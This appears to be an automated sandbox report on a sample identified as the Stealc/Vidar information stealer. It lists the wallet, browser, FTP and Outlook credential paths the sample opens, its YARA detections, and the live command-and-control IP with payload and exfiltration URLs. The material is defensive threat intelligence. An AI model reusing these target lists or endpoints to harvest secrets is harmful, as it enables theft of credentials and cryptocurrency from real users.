Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*Va
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1734725607.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1532570 Sample: file.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 20 Suricata IDS alerts for network traffic 2->20 22 Found malware configuration 2->22 24 Antivirus detection for URL or domain 2->24 26 9 other signatures 2->26 5 file.exe 33 2->5         started        process3 dnsIp4 18 185.215.113.37, 49730, 80 WHOLESALECONNECTIONSNL Portugal 5->18 10 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 5->10 dropped 12 C:\Users\user\AppData\...\softokn3[1].dll, PE32 5->12 dropped 14 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 5->14 dropped 16 9 other files (none is malicious) 5->16 dropped 28 Detected unpacking (changes PE section rights) 5->28 30 Tries to detect sandboxes and other dynamic analysis tools (window names) 5->30 32 Tries to steal Mail credentials (via file / registry access) 5->32 34 12 other signatures 5->34 file5 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.37/ true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/e2b1563c6670f193.php true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll true
  • URL Reputation: malware
 unknown